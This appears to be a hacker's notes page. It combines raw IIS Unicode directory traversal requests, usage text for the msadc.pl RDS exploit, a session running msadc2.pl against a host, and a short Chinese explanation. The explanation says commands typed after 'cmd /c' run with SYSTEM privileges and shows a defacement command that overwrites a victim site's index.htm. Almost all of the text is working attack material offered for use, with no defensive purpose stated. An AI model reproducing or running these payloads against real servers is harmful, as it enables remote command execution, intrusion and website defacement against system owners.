GET /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\r\n\r\n
GET /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\r\n\r\n
GET /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\r\n\r\n
GET /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\r\n\r\n
GET /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0\r\n\r\n
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\host\share\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -h www.targe.com
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:
echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm